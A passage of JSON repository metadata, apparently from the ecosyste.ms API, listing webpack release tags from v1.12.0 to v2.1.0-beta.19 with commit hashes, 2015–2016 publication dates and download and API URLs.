ack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0